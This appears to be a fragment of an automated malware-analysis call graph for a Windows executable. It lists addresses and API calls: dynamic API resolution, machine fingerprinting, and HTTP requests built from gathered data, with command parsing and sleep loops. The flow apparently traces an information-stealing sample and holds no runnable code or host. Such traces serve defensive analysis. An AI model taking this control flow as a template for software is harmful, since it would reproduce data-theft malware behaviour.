90196->90197 90198 402c5b 90197->90198 90199 4024d7 9 API calls 90198->90199 90200 402c6c 90199->90200 90201 4024d7 9 API calls 90200->90201 90202 402c7d 90201->90202 90203 4024d7 9 API calls 90202->90203 90204 402c8e 90203->90204 90205 4024d7 9 API calls 90204->90205 90206 402c9f 90205->90206 90207 4024d7 9 API calls 90206->90207 90208 402cb0 90207->90208 90209 4024d7 9 API calls 90208->90209 90210 402cc1 90209->90210 90211 4024d7 9 API calls 90210->90211 90212 402cd2 90211->90212 90213 4024d7 9 API calls 90212->90213 90214 402ce3 90213->90214 90215 4024d7 9 API calls 90214->90215 90216 402cf4 90215->90216 90217 4024d7 9 API calls 90216->90217 90218 402d05 90217->90218 90219 4024d7 9 API calls 90218->90219 90220 402d16 90219->90220 90221 4024d7 9 API calls 90220->90221 90222 402d27 90221->90222 90223 4024d7 9 API calls 90222->90223 90224 402d38 90223->90224 90225 4024d7 9 API calls 90224->90225 90226 402d49 90225->90226 90227 4024d7 9 API calls 90226->90227 90228 402d5a 90227->90228 90229 4024d7 9 API calls 90228->90229 90230 402d6b 90229->90230 90231 4024d7 9 API calls 90230->90231 90232 402d7c 90231->90232 90233 4024d7 9 API calls 90232->90233 90234 402d8d 90233->90234 90235 4024d7 9 API calls 90234->90235 90236 402d9e 90235->90236 90237 4024d7 9 API calls 90236->90237 90238 402daf 90237->90238 90239 4024d7 9 API calls 90238->90239 90240 402dc0 90239->90240 90241 4024d7 9 API calls 90240->90241 90242 402dd1 90241->90242 90243 4024d7 9 API calls 90242->90243 90244 402de2 90243->90244 90245 4024d7 9 API calls 90244->90245 90246 402df3 90245->90246 90247 4024d7 9 API calls 90246->90247 90248 402e04 90247->90248 90249 4024d7 9 API calls 90248->90249 90250 402e15 90249->90250 90251 4024d7 9 API calls 90250->90251 90252 402e26 90251->90252 90253 4024d7 9 API calls 90252->90253 90254 402e37 90253->90254 90255 4024d7 9 API calls 90254->90255 90256 402e48 90255->90256 90257 4024d7 9 API calls 90256->90257 90258 402e59 90257->90258 90259 4024d7 9 API calls 90258->90259 90260 402e6a 90259->90260 90261 4024d7 9 API calls 90260->90261 90262 402e7b 90261->90262 90263 4024d7 9 API calls 90262->90263 90264 402e8c 90263->90264 90265 4024d7 9 API calls 90264->90265 90266 402e9d 90265->90266 90267 4024d7 9 API calls 90266->90267 90268 402eae 90267->90268 90269 4024d7 9 API calls 90268->90269 90270 402ebf 90269->90270 90271 4024d7 9 API calls 90270->90271 90272 402ed0 90271->90272 90273 4024d7 9 API calls 90272->90273 90274 402ee1 90273->90274 90275 4024d7 9 API calls 90274->90275 90276 402ef2 90275->90276 90277 4024d7 9 API calls 90276->90277 90278 402f03 90277->90278 90279 4024d7 9 API calls 90278->90279 90280 402f14 90279->90280 90281 4024d7 9 API calls 90280->90281 90282 402f25 90281->90282 90283 4024d7 9 API calls 90282->90283 90284 402f36 90283->90284 90285 4024d7 9 API calls 90284->90285 90286 402f47 90285->90286 90287 4024d7 9 API calls 90286->90287 90288 402f58 90287->90288 90289 4024d7 9 API calls 90288->90289 90290 402f69 90289->90290 90291 4024d7 9 API calls 90290->90291 90292 402f7a 90291->90292 90293 4024d7 9 API calls 90292->90293 90294 402f8b 90293->90294 90295 4024d7 9 API calls 90294->90295 90296 402f9c 90295->90296 90297 4024d7 9 API calls 90296->90297 90298 402fad 90297->90298 90299 4024d7 9 API calls 90298->90299 90300 402fbe 90299->90300 90301 4024d7 9 API calls 90300->90301 90302 402fcf 90301->90302 90303 4024d7 9 API calls 90302->90303 90304 402fe0 90303->90304 90305 4024d7 9 API calls 90304->90305 90306 402ff1 90305->90306 90307 4024d7 9 API calls 90306->90307 90308 403002 90307->90308 90309 4024d7 9 API calls 90308->90309 90310 403013 90309->90310 90311 4024d7 9 API calls 90310->90311 90312 403024 90311->90312 90313 4024d7 9 API calls 90312->90313 90314 403035 90313->90314 90315 4024d7 9 API calls 90314->90315 90316 403046 90315->90316 90317 4024d7 9 API calls 90316->90317 90318 403057 90317->90318 90319 4024d7 9 API calls 90318->90319 90320 403068 90319->90320 90321 4024d7 9 API calls 90320->90321 90322 403079 90321->90322 90323 4024d7 9 API calls 90322->90323 90324 40308a 90323->90324 90325 4024d7 9 API calls 90324->90325 90326 40309b 90325->90326 90327 4024d7 9 API calls 90326->90327 90328 4030ac 90327->90328 90329 4024d7 9 API calls 90328->90329 90330 4030bd 90329->90330 90331 4024d7 9 API calls 90330->90331 90332 4030ce 90331->90332 90333 4024d7 9 API calls 90332->90333 90334 4030df 90333->90334 90335 4024d7 9 API calls 90334->90335 90336 4030f0 90335->90336 90337 4024d7 9 API calls 90336->90337 90338 403101 90337->90338 90339 4024d7 9 API calls 90338->90339 90340 403112 90339->90340 90341 4024d7 9 API calls 90340->90341 90342 403123 90341->90342 90343 4024d7 9 API calls 90342->90343 90344 403134 90343->90344 90345 4024d7 9 API calls 90344->90345 90346 403145 90345->90346 90347 4024d7 9 API calls 90346->90347 90348 403156 90347->90348 90349 4024d7 9 API calls 90348->90349 90350 403167 90349->90350 90351 4024d7 9 API calls 90350->90351 90352 403178 90351->90352 90353 4024d7 9 API calls 90352->90353 90354 403189 90353->90354 90355 4024d7 9 API calls 90354->90355 90356 40319a 90355->90356 90357 4024d7 9 API calls 90356->90357 90358 4031ab 90357->90358 90359 4024d7 9 API calls 90358->90359 90360 4031bc 90359->90360 90361 4024d7 9 API calls 90360->90361 90362 4031cd 90361->90362 90363 4024d7 9 API calls 90362->90363 90364 4031de 90363->90364 90365 4024d7 9 API calls 90364->90365 90366 4031ef 90365->90366 90367 4024d7 9 API calls 90366->90367 90368 403200 90367->90368 90369 4024d7 9 API calls 90368->90369 90370 403211 90369->90370 90371 4024d7 9 API calls 90370->90371 90372 403222 90371->90372 90373 4024d7 9 API calls 90372->90373 90374 403233 90373->90374 90375 4024d7 9 API calls 90374->90375 90376 403244 90375->90376 90377 4024d7 9 API calls 90376->90377 90378 403255 90377->90378 90379 4024d7 9 API calls 90378->90379 90380 403266 90379->90380 90381 4024d7 9 API calls 90380->90381 90382 403277 90381->90382 90383 4024d7 9 API calls 90382->90383 90384 403288 90383->90384 90385 4024d7 9 API calls 90384->90385 90386 403299 90385->90386 90387 4024d7 9 API calls 90386->90387 90388 4032aa 90387->90388 90389 4024d7 9 API calls 90388->90389 90390 4032bb 90389->90390 90391 4024d7 9 API calls 90390->90391 90392 4032cc 90391->90392 90393 4024d7 9 API calls 90392->90393 90394 4032dd 90393->90394 90395 4024d7 9 API calls 90394->90395 90396 4032ee 90395->90396 90397 4024d7 9 API calls 90396->90397 90398 4032ff 90397->90398 90399 4024d7 9 API calls 90398->90399 90400 403310 90399->90400 90401 4024d7 9 API calls 90400->90401 90402 403321 90401->90402 90403 4024d7 9 API calls 90402->90403 90404 403332 90403->90404 90405 4024d7 9 API calls 90404->90405 90406 403343 90405->90406 90407 4024d7 9 API calls 90406->90407 90408 403354 90407->90408 90409 4024d7 9 API calls 90408->90409 90410 403365 90409->90410 90411 4024d7 9 API calls 90410->90411 90412 403376 90411->90412 90413 4024d7 9 API calls 90412->90413 90414 403387 90413->90414 90415 4024d7 9 API calls 90414->90415 90416 403398 90415->90416 90417 4024d7 9 API calls 90416->90417 90418 4033a9 90417->90418 90419 4024d7 9 API calls 90418->90419 90420 4033ba 90419->90420 90421 4024d7 9 API calls 90420->90421 90422 4033cb 90421->90422 90423 4024d7 9 API calls 90422->90423 90424 4033dc 90423->90424 90425 4024d7 9 API calls 90424->90425 90426 4033ed 90425->90426 90427 4024d7 9 API calls 90426->90427 90428 4033fe 90427->90428 90429 4024d7 9 API calls 90428->90429 90430 40340f 90429->90430 90431 4024d7 9 API calls 90430->90431 90432 403420 90431->90432 90433 4024d7 9 API calls 90432->90433 90434 403431 90433->90434 90435 4024d7 9 API calls 90434->90435 90436 403442 90435->90436 90437 4024d7 9 API calls 90436->90437 90438 403453 90437->90438 90439 4024d7 9 API calls 90438->90439 90440 403464 90439->90440 90441 4024d7 9 API calls 90440->90441 90442 403475 90441->90442 90443 4024d7 9 API calls 90442->90443 90444 403486 90443->90444 90445 4024d7 9 API calls 90444->90445 90446 403497 90445->90446 90447 4024d7 9 API calls 90446->90447 90448 4034a8 90447->90448 90449 4024d7 9 API calls 90448->90449 90450 4034b9 90449->90450 90451 4024d7 9 API calls 90450->90451 90452 4034ca 90451->90452 90453 4024d7 9 API calls 90452->90453 90454 4034db 90453->90454 90455 4024d7 9 API calls 90454->90455 90456 4034ec 90455->90456 90457 4024d7 9 API calls 90456->90457 90458 4034fd 90457->90458 90459 4024d7 9 API calls 90458->90459 90460 40350e 90459->90460 90461 4024d7 9 API calls 90460->90461 90462 40351f 90461->90462 90463 4024d7 9 API calls 90462->90463 90464 403530 90463->90464 90465 4024d7 9 API calls 90464->90465 90466 403541 90465->90466 90467 4024d7 9 API calls 90466->90467 90468 403552 90467->90468 90469 4024d7 9 API calls 90468->90469 90470 403563 90469->90470 90471 4024d7 9 API calls 90470->90471 90472 403574 90471->90472 90473 4024d7 9 API calls 90472->90473 90474 403585 90473->90474 90475 4024d7 9 API calls 90474->90475 90476 403596 90475->90476 90477 4024d7 9 API calls 90476->90477 90478 4035a7 90477->90478 90479 4024d7 9 API calls 90478->90479 90480 4035b8 90479->90480 90481 4024d7 9 API calls 90480->90481 90482 4035c9 90481->90482 90483 4024d7 9 API calls 90482->90483 90484 4035da 90483->90484 90485 4024d7 9 API calls 90484->90485 90486 4035eb 90485->90486 90487 4024d7 9 API calls 90486->90487 90488 4035fc 90487->90488 90489 4024d7 9 API calls 90488->90489 90490 40360d 90489->90490 90491 4024d7 9 API calls 90490->90491 90492 40361e 90491->90492 90493 4024d7 9 API calls 90492->90493 90494 40362f 90493->90494 90495 4024d7 9 API calls 90494->90495 90496 403640 90495->90496 90497 4024d7 9 API calls 90496->90497 90498 403651 90497->90498 90499 4024d7 9 API calls 90498->90499 90500 403662 90499->90500 90501 4024d7 9 API calls 90500->90501 90502 403673 90501->90502 90503 4024d7 9 API calls 90502->90503 90504 403684 90503->90504 90505 4024d7 9 API calls 90504->90505 90506 403695 90505->90506 90507 4024d7 9 API calls 90506->90507 90508 4036a6 90507->90508 90509 4024d7 9 API calls 90508->90509 90510 4036b7 90509->90510 90511 4024d7 9 API calls 90510->90511 90512 4036c8 90511->90512 90513 4024d7 9 API calls 90512->90513 90514 4036d9 90513->90514 90515 4024d7 9 API calls 90514->90515 90516 4036ea 90515->90516 90517 4024d7 9 API calls 90516->90517 90518 4036fb 90517->90518 90519 4024d7 9 API calls 90518->90519 90520 40370c 90519->90520 90521 4024d7 9 API calls 90520->90521 90522 40371d 90521->90522 90523 4024d7 9 API calls 90522->90523 90524 40372e 90523->90524 90525 4024d7 9 API calls 90524->90525 90526 40373f 90525->90526 90527 4024d7 9 API calls 90526->90527 90528 403750 90527->90528 90529 4024d7 9 API calls 90528->90529 90530 403761 90529->90530 90531 4024d7 9 API calls 90530->90531 90532 403772 90531->90532 90533 4024d7 9 API calls 90532->90533 90534 403783 90533->90534 90535 4024d7 9 API calls 90534->90535 90536 403794 90535->90536 90537 4024d7 9 API calls 90536->90537 90538 4037a5 90537->90538 90539 4024d7 9 API calls 90538->90539 90540 4037b6 90539->90540 90541 4024d7 9 API calls 90540->90541 90542 4037c7 90541->90542 90543 4024d7 9 API calls 90542->90543 90544 4037d8 90543->90544 90545 4024d7 9 API calls 90544->90545 90546 4037e9 90545->90546 90547 4024d7 9 API calls 90546->90547 90548 4037fa 90547->90548 90549 4024d7 9 API calls 90548->90549 90550 40380b 90549->90550 90551 4024d7 9 API calls 90550->90551 90552 40381c 90551->90552 90553 4024d7 9 API calls 90552->90553 90554 40382d 90553->90554 90555 4024d7 9 API calls 90554->90555 90556 40383e 90555->90556 90557 4024d7 9 API calls 90556->90557 90558 40384f 90557->90558 90559 4024d7 9 API calls 90558->90559 90560 403860 90559->90560 90561 4024d7 9 API calls 90560->90561 90562 403871 90561->90562 90563 4024d7 9 API calls 90562->90563 90564 403882 90563->90564 90565 4024d7 9 API calls 90564->90565 90566 403893 90565->90566 90567 4024d7 9 API calls 90566->90567 90568 4038a4 90567->90568 90569 4024d7 9 API calls 90568->90569 90570 4038b5 90569->90570 90571 4024d7 9 API calls 90570->90571 90572 4038c6 90571->90572 90573 4024d7 9 API calls 90572->90573 90574 4038d7 90573->90574 90575 4024d7 9 API calls 90574->90575 90576 4038e8 90575->90576 90577 4024d7 9 API calls 90576->90577 90578 4038f9 90577->90578 90579 4024d7 9 API calls 90578->90579 90580 40390a 90579->90580 90581 4024d7 9 API calls 90580->90581 90582 40391b 90581->90582 90583 4024d7 9 API calls 90582->90583 90584 40392c 90583->90584 90585 4024d7 9 API calls 90584->90585 90586 40393d 90585->90586 90587 4024d7 9 API calls 90586->90587 90588 40394e 90587->90588 90589 4024d7 9 API calls 90588->90589 90590 40395f 90589->90590 90591 4024d7 9 API calls 90590->90591 90592 403970 90591->90592 90593 4024d7 9 API calls 90592->90593 90594 403981 90593->90594 90595 4024d7 9 API calls 90594->90595 90596 403992 90595->90596 90597 4024d7 9 API calls 90596->90597 90598 4039a3 90597->90598 90599 4024d7 9 API calls 90598->90599 90600 4039b4 90599->90600 90601 4024d7 9 API calls 90600->90601 90602 4039c5 90601->90602 90603 4024d7 9 API calls 90602->90603 90604 4039d6 90603->90604 90605 4024d7 9 API calls 90604->90605 90606 4039e7 90605->90606 90607 4024d7 9 API calls 90606->90607 90608 4039f8 90607->90608 90609 4024d7 9 API calls 90608->90609 90610 403a09 90609->90610 90611 4024d7 9 API calls 90610->90611 90612 403a1a 90611->90612 90613 4024d7 9 API calls 90612->90613 90614 403a2b 90613->90614 90615 4024d7 9 API calls 90614->90615 90616 403a3c 90615->90616 90617 4024d7 9 API calls 90616->90617 90618 403a4d 90617->90618 90619 418afd 90618->90619 90620 418b0a 50 API calls 90619->90620 90621 418f7c 9 API calls 90619->90621 90620->90621 90622 41908b 90621->90622 90623 41901d GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90621->90623 90624 419098 8 API calls 90622->90624 90625 41914b 90622->90625 90623->90622 90624->90625 90626 4191c2 90625->90626 90627 419154 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90625->90627 90628 419254 90626->90628 90629 4191cf 6 API calls 90626->90629 90627->90626 90630 419261 9 API calls 90628->90630 90631 41932b 90628->90631 90629->90628 90630->90631 90632 4193a2 90631->90632 90633 419334 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90631->90633 90634 4193d4 90632->90634 90635 4193ab GetProcAddress GetProcAddress 90632->90635 90633->90632 90636 419406 90634->90636 90637 4193dd GetProcAddress GetProcAddress 90634->90637 90635->90634 90638 419413 10 API calls 90636->90638 90639 4194f2 90636->90639 90637->90636 90638->90639 90640 419552 90639->90640 90641 4194fb GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90639->90641 90642 41955b GetProcAddress 90640->90642 90643 41956d 90640->90643 90641->90640 90642->90643 90644 419576 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90643->90644 90645 4195cd 90643->90645 90644->90645 90646 417efc 90645->90646 90647 4195d6 GetProcAddress 90645->90647 90648 411944 _EH_prolog 90646->90648 90647->90646 90649 41070b lstrcpy 90648->90649 90650 41196b 90649->90650 90651 41070b lstrcpy 90650->90651 90652 411982 GetSystemTime 90651->90652 90653 4119a0 90652->90653 90653->89856 90656 41084d 90654->90656 90655 410871 90655->89865 90656->90655 90657 41085f lstrcpy lstrcat 90656->90657 90657->90655 90659 410742 lstrcpy 90658->90659 90660 4010cc 90659->90660 90661 410742 lstrcpy 90660->90661 90662 4010dc 90661->90662 90663 410742 lstrcpy 90662->90663 90664 4010ec 90663->90664 90665 410742 lstrcpy 90664->90665 90666 401108 90665->90666 90667 414d3a _EH_prolog 90666->90667 90668 4142d8 _EH_prolog 90667->90668 90669 414d60 90668->90669 90670 41077f 2 API calls 90669->90670 90671 414d74 90670->90671 90672 41077f 2 API calls 90671->90672 90673 414d81 90672->90673 90674 41077f 2 API calls 90673->90674 90675 414d8e 90674->90675 90676 41070b lstrcpy 90675->90676 90677 414d9e 90676->90677 90678 41070b lstrcpy 90677->90678 90679 414daf 90678->90679 90680 41070b lstrcpy 90679->90680 90681 414dc0 90680->90681 90682 41070b lstrcpy 90681->90682 90683 414dd1 90682->90683 90684 41070b lstrcpy 90683->90684 90685 414de2 90684->90685 90686 41070b lstrcpy 90685->90686 90771 414df3 90686->90771 90687 4020f9 lstrcpy 90687->90771 90689 414f0a StrCmpCA 90689->90771 90690 40212d lstrcpy 90690->90771 90691 414f8b StrCmpCA 90692 415789 90691->90692 90691->90771 90693 4107c9 lstrcpy 90692->90693 90694 415798 90693->90694 91602 40212d 90694->91602 90695 4010b1 _EH_prolog lstrcpy 90695->90771 90698 4107c9 lstrcpy 90700 4157af 90698->90700 90699 415138 StrCmpCA 90701 415744 90699->90701 90699->90771 91605 402286 lstrcpy 90700->91605 90703 4107c9 lstrcpy 90701->90703 90702 402147 lstrcpy 90702->90771 90704 415753 90703->90704 91600 40217b lstrcpy 90704->91600 90708 41575c 90712 4107c9 lstrcpy 90708->90712 90709 4157c4 90710 4107c9 lstrcpy 90709->90710 90714 4157d2 90710->90714 90711 4152e5 StrCmpCA 90715 4156ff 90711->90715 90711->90771 90713 41576a 90712->90713 91601 4022a0 lstrcpy 90713->91601 91606 414005 lstrcpy _EH_prolog 90714->91606 90716 4107c9 lstrcpy 90715->90716 90717 41570e 90716->90717 91598 4021c9 lstrcpy 90717->91598 90722 415717 90724 4107c9 lstrcpy 90722->90724 90723 41568f 90728 4107c9 lstrcpy 90723->90728 90726 415725 90724->90726 90725 415492 StrCmpCA 90727 4156bd 90725->90727 90725->90771 91599 4022ba lstrcpy 90726->91599 90729 4107c9 lstrcpy 90727->90729 90733 41569d 90728->90733 90734 4156cc 90729->90734 90730 413daa 28 API calls 90730->90771 90731 4021c9 lstrcpy 90731->90771 90732 4021e3 lstrcpy 90732->90771 91595 414005 lstrcpy _EH_prolog 90733->91595 91596 402217 lstrcpy 90734->91596 90735 4150b7 StrCmpCA 90735->90771 90738 402195 lstrcpy 90738->90771 90740 40217b lstrcpy 90740->90771 90742 4156d5 90744 4107c9 lstrcpy 90742->90744 90743 415639 StrCmpCA 90745 415654 90743->90745 90746 415644 Sleep 90743->90746 90747 4156e3 90744->90747 90750 4107c9 lstrcpy 90745->90750 90746->90771 91597 4022d4 lstrcpy 90747->91597 90748 402217 lstrcpy 90748->90771 90749 402231 lstrcpy 90749->90771 90751 415663 90750->90751 91593 402265 lstrcpy 90751->91593 90752 415264 StrCmpCA 90752->90771 90756 4156b8 90758 414315 _EH_prolog 90756->90758 90757 41566c 90759 4107c9 lstrcpy 90757->90759 90760 415849 90758->90760 90761 41567a 90759->90761 91587 401061 _EH_prolog 90760->91587 91594 4022ee lstrcpy 90761->91594 90763 413e88 33 API calls 90763->90771 90764 415855 90772 41446c 90764->90772 90765 415411 StrCmpCA 90765->90771 90767 410742 lstrcpy 90767->90771 90768 4155be StrCmpCA 90768->90771 90769 402265 lstrcpy 90769->90771 90770 4107c9 lstrcpy 90770->90771 90771->90687 90771->90689 90771->90690 90771->90691 90771->90695 90771->90699 90771->90702 90771->90711 90771->90725 90771->90730 90771->90731 90771->90732 90771->90735 90771->90738 90771->90740 90771->90743 90771->90748 90771->90749 90771->90752 90771->90763 90771->90765 90771->90767 90771->90768 90771->90769 90771->90770 91584 402113 90771->91584 91589 402161 lstrcpy 90771->91589 91590 4021af lstrcpy 90771->91590 91591 4021fd lstrcpy 90771->91591 91592 40224b lstrcpy 90771->91592 90773 4107c9 lstrcpy 90772->90773 90774 41447c 90773->90774 90775 4107c9 lstrcpy 90774->90775 90776 414488 90775->90776 90777 4107c9 lstrcpy 90776->90777 90778 414494 90777->90778 90779 414315 _EH_prolog 90778->90779 90780 414335 90779->90780 90780->89875 90782 410759 90781->90782 90783 41076e 90782->90783 90784 410766 lstrcpy 90782->90784 90783->89882 90784->90783 90785->89892 90787 4112f7 90786->90787 90788 4112fe GetVolumeInformationA 90786->90788 90787->90788 90789 41132e 90788->90789 90790 411360 GetProcessHeap HeapAlloc 90789->90790 90791 411383 wsprintfA lstrcat 90790->90791 90792 411375 90790->90792 91607 41128a GetCurrentHwProfileA 90791->91607 90793 41070b lstrcpy 90792->90793 90795 41137e 90793->90795 90795->89899 90796 4113b3 90797 4113c2 lstrlenA 90796->90797 90798 4113d6 90797->90798 91611 411f3c lstrcpy malloc strncpy 90798->91611 90800 4113e0 90801 4113ee lstrcat 90800->90801 90802 411401 90801->90802 90803 41070b lstrcpy 90802->90803 90804 411412 90803->90804 90804->90795 90806 410742 lstrcpy 90805->90806 90807 403b25 90806->90807 91612 403a54 _EH_prolog 90807->91612 90809 403b31 90810 41070b lstrcpy 90809->90810 90811 403b4e 90810->90811 90812 41070b lstrcpy 90811->90812 90813 403b61 90812->90813 90814 41070b lstrcpy 90813->90814 90815 403b72 90814->90815 90816 41070b lstrcpy 90815->90816 90817 403b83 90816->90817 90818 41070b lstrcpy 90817->90818 90819 403b94 90818->90819 90820 403ba4 InternetOpenA StrCmpCA 90819->90820 90821 403bc6 90820->90821 90822 404122 InternetCloseHandle 90821->90822 90823 411944 3 API calls 90821->90823 90837 404136 90822->90837 90824 403bdc 90823->90824 90825 410810 3 API calls 90824->90825 90826 403bef 90825->90826 90827 4107c9 lstrcpy 90826->90827 90828 403bfc 90827->90828 90829 410884 4 API calls 90828->90829 90830 403c25 90829->90830 90831 4107c9 lstrcpy 90830->90831 90832 403c32 90831->90832 90833 410884 4 API calls 90832->90833 90834 403c4f 90833->90834 90835 4107c9 lstrcpy 90834->90835 90836 403c5c 90835->90836 90838 410810 3 API calls 90836->90838 90837->89902 90839 403c78 90838->90839 90840 4107c9 lstrcpy 90839->90840 90841 403c85 90840->90841 90842 410884 4 API calls 90841->90842 90843 403ca2 90842->90843 90844 4107c9 lstrcpy 90843->90844 90845 403caf 90844->90845 90846 410884 4 API calls 90845->90846 90847 403ccc 90846->90847 90848 4107c9 lstrcpy 90847->90848 90849 403cd9 90848->90849 90850 410884 4 API calls 90849->90850 90851 403cf7 90850->90851 90852 410810 3 API calls 90851->90852 90853 403d0a 90852->90853 90854 4107c9 lstrcpy 90853->90854 90855 403d17 90854->90855 90856 403d2f InternetConnectA 90855->90856 90856->90822 90857 403d55 HttpOpenRequestA 90856->90857 90858 404119 InternetCloseHandle 90857->90858 90859 403d8e 90857->90859 90858->90822 90860 403d92 InternetSetOptionA 90859->90860 90861 403da8 90859->90861 90860->90861 90862 410884 4 API calls 90861->90862 90863 403db9 90862->90863 90864 4107c9 lstrcpy 90863->90864 90865 403dc6 90864->90865 90866 410810 3 API calls 90865->90866 90867 403de2 90866->90867 90868 4107c9 lstrcpy 90867->90868 90869 403def 90868->90869 90870 410884 4 API calls 90869->90870 90871 403e0c 90870->90871 90872 4107c9 lstrcpy 90871->90872 90873 403e19 90872->90873 90874 410884 4 API calls 90873->90874 90875 403e37 90874->90875 90876 4107c9 lstrcpy 90875->90876 90877 403e44 90876->90877 90878 410884 4 API calls 90877->90878 90879 403e61 90878->90879 90880 4107c9 lstrcpy 90879->90880 90881 403e6e 90880->90881 90882 410884 4 API calls 90881->90882 90883 403e8b 90882->90883 90884 4107c9 lstrcpy 90883->90884 90885 403e98 90884->90885 90886 410810 3 API calls 90885->90886 90887 403eb4 90886->90887 90888 4107c9 lstrcpy 90887->90888 90889 403ec1 90888->90889 90890 410884 4 API calls 90889->90890 90891 403ede 90890->90891 90892 4107c9 lstrcpy 90891->90892 90893 403eeb 90892->90893 90894 410884 4 API calls 90893->90894 90895 403f08 90894->90895 90896 4107c9 lstrcpy 90895->90896 90897 403f15 90896->90897 90898 410810 3 API calls 90897->90898 90899 403f31 90898->90899 90900 4107c9 lstrcpy 90899->90900 90901 403f3e 90900->90901 90902 410884 4 API calls 90901->90902 90903 403f5b 90902->90903 90904 4107c9 lstrcpy 90903->90904 90905 403f68 90904->90905 90906 410884 4 API calls 90905->90906 90907 403f86 90906->90907 90908 4107c9 lstrcpy 90907->90908 90909 403f93 90908->90909 90910 410884 4 API calls 90909->90910 90911 403fb0 90910->90911 90912 4107c9 lstrcpy 90911->90912 90913 403fbd 90912->90913 90914 410884 4 API calls 90913->90914 90915 403fda 90914->90915 90916 4107c9 lstrcpy 90915->90916 90917 403fe7 90916->90917 90918 410810 3 API calls 90917->90918 90919 404003 90918->90919 90920 4107c9 lstrcpy 90919->90920 90921 404010 90920->90921 90922 41070b lstrcpy 90921->90922 90923 404029 90922->90923 90924 410810 3 API calls 90923->90924 90925 40403d 90924->90925 90926 410810 3 API calls 90925->90926 90927 404050 90926->90927 90928 4107c9 lstrcpy 90927->90928 90929 40405d 90928->90929 90930 40407d lstrlenA 90929->90930 90931 40408d 90930->90931 90932 404096 lstrlenA 90931->90932 91620 410935 90932->91620 90934 4040a6 HttpSendRequestA 90935 4040ef InternetReadFile 90934->90935 90936 404106 InternetCloseHandle 90935->90936 90939 4040b5 90935->90939 91621 410776 90936->91621 90938 410884 4 API calls 90938->90939 90939->90935 90939->90936 90939->90938 90940 4107c9 lstrcpy 90939->90940 90940->90939 91625 410935 90941->91625 90943 412f55 StrCmpCA 90944 412f60 ExitProcess 90943->90944 90945 412f67 90943->90945 90946 412f77 strtok_s 90945->90946 90948 4130c4 90946->90948 90959 412f88 90946->90959 90947 4130a9 strtok_s 90947->90948 90947->90959 90948->89904 90949 412fa0 StrCmpCA 90949->90947 90949->90959 90950 413033 StrCmpCA 90950->90947 90950->90959 90951 413073 StrCmpCA 90951->90947 90952 413095 StrCmpCA 90952->90947 90953 412ff4 StrCmpCA 90953->90947 90953->90959 90954 412fd8 StrCmpCA 90954->90947 90954->90959 90955 413048 StrCmpCA 90955->90947 90955->90959 90956 41305d StrCmpCA 90956->90947 90957 412fbc StrCmpCA 90957->90947 90957->90959 90958 41301e StrCmpCA 90958->90947 90958->90959 90959->90947 90959->90949 90959->90950 90959->90951 90959->90952 90959->90953 90959->90954 90959->90955 90959->90956 90959->90957 90959->90958 90960 41077f 2 API calls 90959->90960 90960->90959 90962 410742 lstrcpy 90961->90962 90963 405cb9 90962->90963 90964 403a54 6 API calls 90963->90964 90965 405cc5 90964->90965 90966 41070b lstrcpy 90965->90966 90967 405ce2 90966->90967 90968 41070b lstrcpy 90967->90968 90969 405cf5 90968->90969 90970 41070b lstrcpy 90969->90970 90971 405d06 90970->90971 90972 41070b lstrcpy 90971->90972 90973 405d17 90972->90973 90974 41070b lstrcpy 90973->90974 90975 405d28 90974->90975 90976 405d38 InternetOpenA StrCmpCA 90975->90976 90977 405d5a 90976->90977 90978 406415 InternetCloseHandle 90977->90978 90979 411944 3 API calls 90977->90979 90980 406430 90978->90980 90981 405d70 90979->90981 91632 406d7f CryptStringToBinaryA 90980->91632 90982 410810 3 API calls 90981->90982 90985 405d83 90982->90985 90986 4107c9 lstrcpy 90985->90986 90990 405d90 90986->90990 90987 41077f 2 API calls 90988 406449 90987->90988 90989 410884 4 API calls 90988->90989 90991 406457 90989->90991 90993 410884 4 API calls 90990->90993 90992 4107c9 lstrcpy 90991->90992 90998 406463 90992->90998 90994 405db9 90993->90994 90995 4107c9 lstrcpy 90994->90995 90996 405dc6 90995->90996 90997 410884 4 API calls 90996->90997 90999 405de3 90997->90999 91000 401061 _EH_prolog 90998->91000 91002 4107c9 lstrcpy 90999->91002 91001 4064c1 91000->91001 91001->89910 91003 405df0 91002->91003 91004 410810 3 API calls 91003->91004 91005 405e0c 91004->91005 91006 4107c9 lstrcpy 91005->91006 91007 405e19 91006->91007 91008 410884 4 API calls 91007->91008 91009 405e36 91008->91009 91010 4107c9 lstrcpy 91009->91010 91011 405e43 91010->91011 91012 410884 4 API calls 91011->91012 91013 405e60 91012->91013 91014 4107c9 lstrcpy 91013->91014 91015 405e6d 91014->91015 91016 410884 4 API calls 91015->91016 91017 405e8b 91016->91017 91018 410810 3 API calls 91017->91018 91019 405e9e 91018->91019 91020 4107c9 lstrcpy 91019->91020 91021 405eab 91020->91021 91022 405ec3 InternetConnectA 91021->91022 91022->90978 91023 405ee9 HttpOpenRequestA 91022->91023 91024 405f20 91023->91024 91025 40640c InternetCloseHandle 91023->91025 91026 405f24 InternetSetOptionA 91024->91026 91027 405f3a 91024->91027 91025->90978 91026->91027 91028 410884 4 API calls 91027->91028 91029 405f4b 91028->91029 91030 4107c9 lstrcpy 91029->91030 91031 405f58 91030->91031 91032 410810 3 API calls 91031->91032 91033 405f74 91032->91033 91034 4107c9 lstrcpy 91033->91034 91035 405f81 91034->91035 91036 410884 4 API calls 91035->91036 91037 405f9e 91036->91037 91038 4107c9 lstrcpy 91037->91038 91039 405fab 91038->91039 91040 410884 4 API calls 91039->91040 91041 405fc9 91040->91041 91042 4107c9 lstrcpy 91041->91042 91043 405fd6 91042->91043 91044 410884 4 API calls 91043->91044 91045 405ff4 91044->91045 91046 4107c9 lstrcpy 91045->91046 91047 406001 91046->91047 91048 410884 4 API calls 91047->91048 91049 40601e 91048->91049 91050 4107c9 lstrcpy 91049->91050 91051 40602b 91050->91051 91052 410810 3 API calls 91051->91052 91053 406047 91052->91053 91054 4107c9 lstrcpy 91053->91054 91055 406054 91054->91055 91056 410884 4 API calls 91055->91056 91057 406071 91056->91057 91058 4107c9 lstrcpy 91057->91058 91059 40607e 91058->91059 91060 410884 4 API calls 91059->91060 91061 40609b 91060->91061 91062 4107c9 lstrcpy 91061->91062 91063 4060a8 91062->91063 91064 410810 3 API calls 91063->91064 91065 4060c4 91064->91065 91066 4107c9 lstrcpy 91065->91066 91067 4060d1 91066->91067 91068 410884 4 API calls 